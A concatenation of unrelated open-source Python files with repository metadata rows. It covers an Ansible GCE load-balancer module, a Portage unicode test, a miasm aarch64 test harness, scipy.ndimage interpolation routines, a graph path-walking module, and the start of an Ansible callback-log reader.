interval=httphealthcheck_interval,
timeout=httphealthcheck_timeout,
unhealthy_threshold=httphealthcheck_unhealthy_count,
healthy_threshold=httphealthcheck_healthy_count)
changed = True
except ResourceExistsError:
hc = gce.ex_get_healthcheck(httphealthcheck_name)
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
if hc is not None:
json_output['httphealthcheck_host'] = hc.extra['host']
json_output['httphealthcheck_path'] = hc.path
json_output['httphealthcheck_port'] = hc.port
json_output['httphealthcheck_interval'] = hc.interval
json_output['httphealthcheck_timeout'] = hc.timeout
json_output['httphealthcheck_unhealthy_count'] = \
hc.unhealthy_threshold
json_output['httphealthcheck_healthy_count'] = \
hc.healthy_threshold
# create the forwarding rule (and target pool under the hood)
lb = None
if name:
if not region:
module.fail_json(msg='Missing required region name',
changed=False)
nodes = []
output_nodes = []
json_output['name'] = name
# members is a python list of 'zone/inst' strings
if members:
for node in members:
try:
zone, node_name = node.split('/')
nodes.append(gce.ex_get_node(node_name, zone))
output_nodes.append(node)
except:
# skip nodes that are badly formatted or don't exist
pass
try:
if hc is not None:
lb = gcelb.create_balancer(name, port_range, protocol,
None, nodes, ex_region=region, ex_healthchecks=[hc],
ex_address=external_ip)
else:
lb = gcelb.create_balancer(name, port_range, protocol,
None, nodes, ex_region=region, ex_address=external_ip)
changed = True
except ResourceExistsError:
lb = gcelb.get_balancer(name)
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
if lb is not None:
json_output['members'] = output_nodes
json_output['protocol'] = protocol
json_output['region'] = region
json_output['external_ip'] = lb.ip
json_output['port_range'] = lb.port
hc_names = []
if 'healthchecks' in lb.extra:
for hc in lb.extra['healthchecks']:
hc_names.append(hc.name)
json_output['httphealthchecks'] = hc_names
if state in ['absent', 'deleted']:
# first, delete the load balancer (forwarding rule and target pool)
# if specified.
if name:
json_output['name'] = name
try:
lb = gcelb.get_balancer(name)
gcelb.destroy_balancer(lb)
changed = True
except ResourceNotFoundError:
pass
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
# destroy the health check if specified
if httphealthcheck_name:
json_output['httphealthcheck_name'] = httphealthcheck_name
try:
hc = gce.ex_get_healthcheck(httphealthcheck_name)
gce.ex_destroy_healthcheck(hc)
changed = True
except ResourceNotFoundError:
pass
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
json_output['changed'] = changed
module.exit_json(**json_output)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.gce import *
if __name__ == '__main__':
main()
| gpl-3.0 | 517,273,460,745,364,200 | 35.357143 | 93 | 0.615914 | false |
nullishzero/Portage | pym/portage/tests/unicode/test_string_format.py | 11 | 3238 | # Copyright 2010-2014 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
from __future__ import unicode_literals
import sys
from portage import _encodings, _unicode_encode
from portage.exception import PortageException
from portage.tests import TestCase
from _emerge.DependencyArg import DependencyArg
from _emerge.UseFlagDisplay import UseFlagDisplay
if sys.hexversion >= 0x3000000:
# pylint: disable=W0622
basestring = str
STR_IS_UNICODE = sys.hexversion >= 0x3000000
class StringFormatTestCase(TestCase):
"""
Test that string formatting works correctly in the current interpretter,
which may be either python2 or python3.
"""
# We need unicode_literals in order to get some unicode test strings
# in a way that works in both python2 and python3.
unicode_strings = (
'\u2018',
'\u2019',
)
def testDependencyArg(self):
self.assertEqual(_encodings['content'], 'utf_8')
for arg_unicode in self.unicode_strings:
arg_bytes = _unicode_encode(arg_unicode, encoding=_encodings['content'])
dependency_arg = DependencyArg(arg=arg_unicode)
# Use unicode_literals for unicode format string so that
# __unicode__() is called in Python 2.
formatted_str = "%s" % (dependency_arg,)
self.assertEqual(formatted_str, arg_unicode)
if STR_IS_UNICODE:
# Test the __str__ method which returns unicode in python3
formatted_str = "%s" % (dependency_arg,)
self.assertEqual(formatted_str, arg_unicode)
else:
# Test the __str__ method which returns encoded bytes in python2
formatted_bytes = b"%s" % (dependency_arg,)
self.assertEqual(formatted_bytes, arg_bytes)
def testPortageException(self):
self.assertEqual(_encodings['content'], 'utf_8')
for arg_unicode in self.unicode_strings:
arg_bytes = _unicode_encode(arg_unicode, encoding=_encodings['content'])
e = PortageException(arg_unicode)
# Use unicode_literals for unicode format string so that
# __unicode__() is called in Python 2.
formatted_str = "%s" % (e,)
self.assertEqual(formatted_str, arg_unicode)
if STR_IS_UNICODE:
# Test the __str__ method which returns unicode in python3
formatted_str = "%s" % (e,)
self.assertEqual(formatted_str, arg_unicode)
else:
# Test the __str__ method which returns encoded bytes in python2
formatted_bytes = b"%s" % (e,)
self.assertEqual(formatted_bytes, arg_bytes)
def testUseFlagDisplay(self):
self.assertEqual(_encodings['content'], 'utf_8')
for enabled in (True, False):
for forced in (True, False):
for arg_unicode in self.unicode_strings:
e = UseFlagDisplay(arg_unicode, enabled, forced)
# Use unicode_literals for unicode format string so that
# __unicode__() is called in Python 2.
formatted_str = "%s" % (e,)
self.assertEqual(isinstance(formatted_str, basestring), True)
if STR_IS_UNICODE:
# Test the __str__ method which returns unicode in python3
formatted_str = "%s" % (e,)
self.assertEqual(isinstance(formatted_str, str), True)
else:
# Test the __str__ method which returns encoded bytes in python2
formatted_bytes = b"%s" % (e,)
self.assertEqual(isinstance(formatted_bytes, bytes), True)
| gpl-2.0 | 3,093,918,245,920,799,000 | 28.981481 | 75 | 0.701359 | false |
dynm/miasm | test/arch/aarch64/unit/asm_test.py | 5 | 1790 | #! /usr/bin/env python
import sys
import os
from miasm2.core.cpu import parse_ast
from miasm2.arch.aarch64.arch import mn_aarch64, base_expr, variable
from miasm2.core import parse_asm
from miasm2.expression.expression import *
from miasm2.core import asmbloc
from elfesteem.strpatchwork import StrPatchwork
from miasm2.analysis.machine import Machine
from miasm2.jitter.csts import *
from pdb import pm
filename = os.environ.get('PYTHONSTARTUP')
if filename and os.path.isfile(filename):
execfile(filename)
reg_and_id = dict(mn_aarch64.regs.all_regs_ids_byname)
class Asm_Test(object):
def __init__(self):
self.myjit = Machine("aarch64l").jitter()
self.myjit.init_stack()
self.myjit.jit.log_regs = False
self.myjit.jit.log_mn = False
def __call__(self):
self.asm()
self.run()
self.check()
def asm(self):
blocs, symbol_pool = parse_asm.parse_txt(mn_aarch64, 'l', self.TXT,
symbol_pool = self.myjit.ir_arch.symbol_pool)
# fix shellcode addr
symbol_pool.set_offset(symbol_pool.getby_name("main"), 0x0)
s = StrPatchwork()
patches = asmbloc.asm_resolve_final(mn_aarch64, blocs[0], symbol_pool)
for offset, raw in patches.items():
s[offset] = raw
self.assembly = str(s)
def run(self):
run_addr = 0
self.myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, self.assembly)
self.myjit.cpu.LR = 0x1337beef
self.myjit.add_breakpoint(0x1337beef, lambda x:False)
self.myjit.init_run(run_addr)
self.myjit.continue_run()
assert(self.myjit.pc == 0x1337beef)
def check(self):
raise NotImplementedError('abstract method')
| gpl-2.0 | -7,165,890,506,159,838,000 | 26.96875 | 94 | 0.643017 | false |
piyush0609/scipy | scipy/ndimage/interpolation.py | 36 | 26949 | # Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function, absolute_import
import math
import numpy
from . import _ni_support
from . import _nd_image
import warnings
__all__ = ['spline_filter1d', 'spline_filter', 'geometric_transform',
'map_coordinates', 'affine_transform', 'shift', 'zoom', 'rotate']
def _extend_mode_to_code(mode):
mode = _ni_support._extend_mode_to_code(mode)
return mode
def spline_filter1d(input, order=3, axis=-1, output=numpy.float64):
"""
Calculates a one-dimensional spline filter along the given axis.
The lines of the array along the given axis are filtered by a
spline filter. The order of the spline must be >= 2 and <= 5.
Parameters
----------
input : array_like
The input array.
order : int, optional
The order of the spline, default is 3.
axis : int, optional
The axis along which the spline filter is applied. Default is the last
axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array. Default is `numpy.float64`.
Returns
-------
spline_filter1d : ndarray or None
The filtered input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if order in [0, 1]:
output[...] = numpy.array(input)
else:
axis = _ni_support._check_axis(axis, input.ndim)
_nd_image.spline_filter1d(input, order, axis, output)
return return_value
def spline_filter(input, order=3, output=numpy.float64):
"""
Multi-dimensional spline filter.
For more details, see `spline_filter1d`.
See Also
--------
spline_filter1d
Notes
-----
The multi-dimensional filter is implemented as a sequence of
one-dimensional spline filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
"""
if order < 2 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if order not in [0, 1] and input.ndim > 0:
for axis in range(input.ndim):
spline_filter1d(input, order, axis, output=output)
input = output
else:
output[...] = input[...]
return return_value
def _geometric_transform(input, mapping, coordinates, matrix, offset, output,
order, mode, cval, extra_arguments, extra_keywords):
"""
Wrapper around _nd_image.geometric_transform to work around
endianness issues
"""
_nd_image.geometric_transform(
input, mapping, coordinates, matrix, offset, output,
order, mode, cval, extra_arguments, extra_keywords)
if output is not None and not output.dtype.isnative:
output.byteswap(True)
return output
def geometric_transform(input, mapping, output_shape=None,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True,
extra_arguments=(), extra_keywords={}):
"""
Apply an arbritrary geometric transform.
The given mapping function is used to find, for each point in the
output, the corresponding coordinates in the input. The value of the
input at those coordinates is determined by spline interpolation of
the requested order.
Parameters
----------
input : array_like
The input array.
mapping : callable
A callable object that accepts a tuple of length equal to the output
array rank, and returns the corresponding input coordinates as a tuple
of length equal to the input array rank.
output_shape : tuple of ints, optional
Shape tuple.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
extra_arguments : tuple, optional
Extra arguments passed to `mapping`.
extra_keywords : dict, optional
Extra keywords passed to `mapping`.
Returns
-------
return_value : ndarray or None
The filtered input. If `output` is given as a parameter, None is
returned.
See Also
--------
map_coordinates, affine_transform, spline_filter1d
Examples
--------
>>> from scipy import ndimage
>>> a = np.arange(12.).reshape((4, 3))
>>> def shift_func(output_coords):
... return (output_coords[0] - 0.5, output_coords[1] - 0.5)
...
>>> ndimage.geometric_transform(a, shift_func)
array([[ 0. , 0. , 0. ],
[ 0. , 1.362, 2.738],
[ 0. , 4.812, 6.187],
[ 0. , 8.263, 9.637]])
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
_geometric_transform(filtered, mapping, None, None, None, output,
order, mode, cval, extra_arguments, extra_keywords)
return return_value
def map_coordinates(input, coordinates, output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Map the input array to new coordinates by interpolation.
The array of coordinates is used to find, for each point in the output,
the corresponding coordinates in the input. The value of the input at
those coordinates is determined by spline interpolation of the
requested order.
The shape of the output is derived from that of the coordinate
array by dropping the first axis. The values of the array along
the first axis are the coordinates in the input array at which the
output value is found.
Parameters
----------
input : ndarray
The input array.
coordinates : array_like
The coordinates at which `input` is evaluated.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
map_coordinates : ndarray
The result of transforming the input. The shape of the output is
derived from that of `coordinates` by dropping the first axis.
See Also
--------
spline_filter, geometric_transform, scipy.interpolate
Examples
--------
>>> from scipy import ndimage
>>> a = np.arange(12.).reshape((4, 3))
>>> a
array([[ 0., 1., 2.],
[ 3., 4., 5.],
[ 6., 7., 8.],
[ 9., 10., 11.]])
>>> ndimage.map_coordinates(a, [[0.5, 2], [0.5, 1]], order=1)
array([ 2., 7.])
Above, the interpolated value of a[0.5, 0.5] gives output[0], while
a[2, 1] is output[1].
>>> inds = np.array([[0.5, 2], [0.5, 4]])
>>> ndimage.map_coordinates(a, inds, order=1, cval=-33.3)
array([ 2. , -33.3])
>>> ndimage.map_coordinates(a, inds, order=1, mode='nearest')
array([ 2., 8.])
>>> ndimage.map_coordinates(a, inds, order=1, cval=0, output=bool)
array([ True, False], dtype=bool)
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
coordinates = numpy.asarray(coordinates)
if numpy.iscomplexobj(coordinates):
raise TypeError('Complex type not supported')
output_shape = coordinates.shape[1:]
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
if coordinates.shape[0] != input.ndim:
raise RuntimeError('invalid shape for coordinate array')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
_geometric_transform(filtered, None, coordinates, None, None,
output, order, mode, cval, None, None)
return return_value
def affine_transform(input, matrix, offset=0.0, output_shape=None,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Apply an affine transformation.
The given matrix and offset are used to find for each point in the
output the corresponding coordinates in the input by an affine
transformation. The value of the input at those coordinates is
determined by spline interpolation of the requested order. Points
outside the boundaries of the input are filled according to the given
mode.
Parameters
----------
input : ndarray
The input array.
matrix : ndarray
The matrix must be two-dimensional or can also be given as a
one-dimensional sequence or array. In the latter case, it is assumed
that the matrix is diagonal. A more efficient algorithms is then
applied that exploits the separability of the problem.
offset : float or sequence, optional
The offset into the array where the transform is applied. If a float,
`offset` is the same for each axis. If a sequence, `offset` should
contain one value for each axis.
output_shape : tuple of ints, optional
Shape tuple.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
affine_transform : ndarray or None
The transformed input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
matrix = numpy.asarray(matrix, dtype=numpy.float64)
if matrix.ndim not in [1, 2] or matrix.shape[0] < 1:
raise RuntimeError('no proper affine matrix provided')
if matrix.shape[0] != input.ndim:
raise RuntimeError('affine matrix has wrong number of rows')
if matrix.ndim == 2 and matrix.shape[1] != output.ndim:
raise RuntimeError('affine matrix has wrong number of columns')
if not matrix.flags.contiguous:
matrix = matrix.copy()
offset = _ni_support._normalize_sequence(offset, input.ndim)
offset = numpy.asarray(offset, dtype=numpy.float64)
if offset.ndim != 1 or offset.shape[0] < 1:
raise RuntimeError('no proper offset provided')
if not offset.flags.contiguous:
offset = offset.copy()
if matrix.ndim == 1:
_nd_image.zoom_shift(filtered, matrix, offset, output, order,
mode, cval)
else:
_geometric_transform(filtered, None, None, matrix, offset,
output, order, mode, cval, None, None)
return return_value
def shift(input, shift, output=None, order=3, mode='constant', cval=0.0,
prefilter=True):
"""
Shift an array.
The array is shifted using spline interpolation of the requested order.
Points outside the boundaries of the input are filled according to the
given mode.
Parameters
----------
input : ndarray
The input array.
shift : float or sequence, optional
The shift along the axes. If a float, `shift` is the same for each
axis. If a sequence, `shift` should contain one value for each axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
shift : ndarray or None
The shifted input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input)
shift = _ni_support._normalize_sequence(shift, input.ndim)
shift = [-ii for ii in shift]
shift = numpy.asarray(shift, dtype=numpy.float64)
if not shift.flags.contiguous:
shift = shift.copy()
_nd_image.zoom_shift(filtered, None, shift, output, order, mode, cval)
return return_value
def zoom(input, zoom, output=None, order=3, mode='constant', cval=0.0,
prefilter=True):
"""
Zoom an array.
The array is zoomed using spline interpolation of the requested order.
Parameters
----------
input : ndarray
The input array.
zoom : float or sequence, optional
The zoom factor along the axes. If a float, `zoom` is the same for each
axis. If a sequence, `zoom` should contain one value for each axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
zoom : ndarray or None
The zoomed input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output=numpy.float64)
else:
filtered = input
zoom = _ni_support._normalize_sequence(zoom, input.ndim)
output_shape = tuple(
[int(round(ii * jj)) for ii, jj in zip(input.shape, zoom)])
output_shape_old = tuple(
[int(ii * jj) for ii, jj in zip(input.shape, zoom)])
if output_shape != output_shape_old:
warnings.warn(
"From scipy 0.13.0, the output shape of zoom() is calculated "
"with round() instead of int() - for these inputs the size of "
"the returned array has changed.", UserWarning)
zoom_div = numpy.array(output_shape, float) - 1
zoom = (numpy.array(input.shape) - 1) / zoom_div
# Zooming to non-finite values is unpredictable, so just choose
# zoom factor 1 instead
zoom[~numpy.isfinite(zoom)] = 1
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
zoom = numpy.asarray(zoom, dtype=numpy.float64)
zoom = numpy.ascontiguousarray(zoom)
_nd_image.zoom_shift(filtered, zoom, None, output, order, mode, cval)
return return_value
def _minmax(coor, minc, maxc):
if coor[0] < minc[0]:
minc[0] = coor[0]
if coor[0] > maxc[0]:
maxc[0] = coor[0]
if coor[1] < minc[1]:
minc[1] = coor[1]
if coor[1] > maxc[1]:
maxc[1] = coor[1]
return minc, maxc
def rotate(input, angle, axes=(1, 0), reshape=True,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Rotate an array.
The array is rotated in the plane defined by the two axes given by the
`axes` parameter using spline interpolation of the requested order.
Parameters
----------
input : ndarray
The input array.
angle : float
The rotation angle in degrees.
axes : tuple of 2 ints, optional
The two axes that define the plane of rotation. Default is the first
two axes.
reshape : bool, optional
If `reshape` is true, the output shape is adapted so that the input
array is contained completely in the output. Default is True.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
rotate : ndarray or None
The rotated input. If `output` is given as a parameter, None is
returned.
"""
input = numpy.asarray(input)
axes = list(axes)
rank = input.ndim
if axes[0] < 0:
axes[0] += rank
if axes[1] < 0:
axes[1] += rank
if axes[0] < 0 or axes[1] < 0 or axes[0] > rank or axes[1] > rank:
raise RuntimeError('invalid rotation plane specified')
if axes[0] > axes[1]:
axes = axes[1], axes[0]
angle = numpy.pi / 180 * angle
m11 = math.cos(angle)
m12 = math.sin(angle)
m21 = -math.sin(angle)
m22 = math.cos(angle)
matrix = numpy.array([[m11, m12],
[m21, m22]], dtype=numpy.float64)
iy = input.shape[axes[0]]
ix = input.shape[axes[1]]
if reshape:
mtrx = numpy.array([[m11, -m21],
[-m12, m22]], dtype=numpy.float64)
minc = [0, 0]
maxc = [0, 0]
coor = numpy.dot(mtrx, [0, ix])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, 0])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, ix])
minc, maxc = _minmax(coor, minc, maxc)
oy = int(maxc[0] - minc[0] + 0.5)
ox = int(maxc[1] - minc[1] + 0.5)
else:
oy = input.shape[axes[0]]
ox = input.shape[axes[1]]
offset = numpy.zeros((2,), dtype=numpy.float64)
offset[0] = float(oy) / 2.0 - 0.5
offset[1] = float(ox) / 2.0 - 0.5
offset = numpy.dot(matrix, offset)
tmp = numpy.zeros((2,), dtype=numpy.float64)
tmp[0] = float(iy) / 2.0 - 0.5
tmp[1] = float(ix) / 2.0 - 0.5
offset = tmp - offset
output_shape = list(input.shape)
output_shape[axes[0]] = oy
output_shape[axes[1]] = ox
output_shape = tuple(output_shape)
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
if input.ndim <= 2:
affine_transform(input, matrix, offset, output_shape, output,
order, mode, cval, prefilter)
else:
coordinates = []
size = numpy.product(input.shape,axis=0)
size //= input.shape[axes[0]]
size //= input.shape[axes[1]]
for ii in range(input.ndim):
if ii not in axes:
coordinates.append(0)
else:
coordinates.append(slice(None, None, None))
iter_axes = list(range(input.ndim))
iter_axes.reverse()
iter_axes.remove(axes[0])
iter_axes.remove(axes[1])
os = (output_shape[axes[0]], output_shape[axes[1]])
for ii in range(size):
ia = input[tuple(coordinates)]
oa = output[tuple(coordinates)]
affine_transform(ia, matrix, offset, os, oa, order, mode,
cval, prefilter)
for jj in iter_axes:
if coordinates[jj] < input.shape[jj] - 1:
coordinates[jj] += 1
break
else:
coordinates[jj] = 0
return return_value
| bsd-3-clause | 354,336,398,864,894,400 | 37.27983 | 79 | 0.625997 | false |
Maillol/cricri | cricri/algo.py | 2 | 3076 | """
A collection of functions to perform operation on containers.
"""
from collections import defaultdict
def find_loop(graph):
"""
Find loop in *graph*
"""
loops_from_start = defaultdict(list)
def _walk(graph, start, end, visited_nodes, path):
"""
Find all pathes between *start* and *end* through *graph*.
without visit the same node.
The pathes are stored in *loops_from_start*.
"""
for next_node in graph[start]:
if next_node == end:
loops_from_start[end].append(
(end,) + path + (next_node,)
)
elif next_node not in visited_nodes:
_walk(graph, next_node, end,
visited_nodes | {next_node, },
path + (next_node,))
for node in graph:
_walk(graph, node, node, set(), tuple())
return loops_from_start
def insert_loop(pathes, loops_from_start):
"""
Insert loop in list of path.
"""
pathes_with_loop = []
for path in pathes:
path_with_loop = [()]
for node in path:
path_with_loop = [
out + loop
for out in path_with_loop
for loop in loops_from_start[node]]
pathes_with_loop.extend(path_with_loop)
return pathes_with_loop
def all_longer_path(graph, start, path, sub_path_explored, out):
"""
Find all longer pathes through graph.
graph - must be a dict mappinp graph node to next graph node.
start - must be a first graph node
path - must be an empty list
sub_path_explored - must be an empty set
out - path found is added to out list.
"""
flag = True
for step in graph[start]:
sub_path = (start, step)
if sub_path not in sub_path_explored:
flag = False
all_longer_path(graph, step,
path + [sub_path],
sub_path_explored | {sub_path},
out)
if flag:
if len(graph) == 1:
out.append((start,))
else:
out.append(tuple(e[0] for e in path) + (path[-1][-1],))
def walk(graph, start, nb_loop=0):
"""
Find all longer pathes through graph.
graph - must be a dict mappinp graph node to next graph node.
start - must be a first graph node
nb_loop - number of loops per node
"""
if nb_loop < 0:
raise ValueError('last parameter must be greater or equal 0')
longer_pathes = []
all_longer_path(graph, start, [], set(), longer_pathes)
if nb_loop:
loops_from_start = find_loop(graph)
loops_from_start = {
start: [(loop + loop[1:] * (nb_loop - 1))
for loop
in loops]
for start, loops
in loops_from_start.items()
}
for node in graph:
loops_from_start.setdefault(node, [(node,)])
longer_pathes = insert_loop(longer_pathes, loops_from_start)
return longer_pathes
| gpl-3.0 | -1,602,775,323,397,272,000 | 26.464286 | 69 | 0.536736 | false |
lykops/lykops | library/connecter/ansible/callback/read.py | 1 | 14475 | import logging
from library.connecter.database.mongo import Op_Mongo
from library.utils.time_conv import timestamp2datetime
class Parse_Cblog():
def __init__(self, oper, log_router=False, mongoclient=None):
'''
根据condition_dict读取所有的callback日志
:parm
condition_dict:查询条件
'''
self.logger = logging.getLogger("ansible")
if mongoclient is None :
self.mongoclient = Op_Mongo()
else :
self.mongoclient = mongoclient
if not log_router:
from library.storage.logging import Routing_Logging
log_router = Routing_Logging()
self.log_router = log_router
self.collect = oper + '.ansible.callback'
self.log_dict = {
'level':'info',
'dest' : 'mongo',
'mongo' : self.collect,
}
def parse(self, uuid_str):
'''
根据uuid_str读取callback日志
'''
log_prefix = '查询uuid为' + uuid_str + '的ansible任务执行报表'
result = self.log_router.read(condition_dict={'uuid':uuid_str}, log_dict=self.log_dict, limit=0, lastest_field=False)
self.readlog_list = result[1]
if not result[0] :
self.logger.error(log_prefix + '失败,原因:' + result[1])
return (False, log_prefix + '失败,' + result[1])
try :
name = self.readlog_list[0]['name']
exec_mode = self.readlog_list[0]['mode']
describe = self.readlog_list[0]['describe']
options = self.readlog_list[0]['options']
# create_time = self.readlog_list[0]['create_time']
create_date = self.readlog_list[0]['create_date']
inventory_content = self.readlog_list[0]['inventory_content']
create_ts = self.readlog_list[0]['add_time']
finish_ts = self.readlog_list[-1]['add_time']
except Exception as e:
self.logger.error(log_prefix + '失败,原因:该任务还没有开始执行或者数据错误,' + str(e))
return (False, '该任务还没有开始执行或者数据错误')
pattern = self.readlog_list[0].get('pattern', None)
module_name = self.readlog_list[0].get('module_name', None)
module_args = self.readlog_list[0].get('module_args', None)
yaml_content = self.readlog_list[0].get('yaml_content', None)
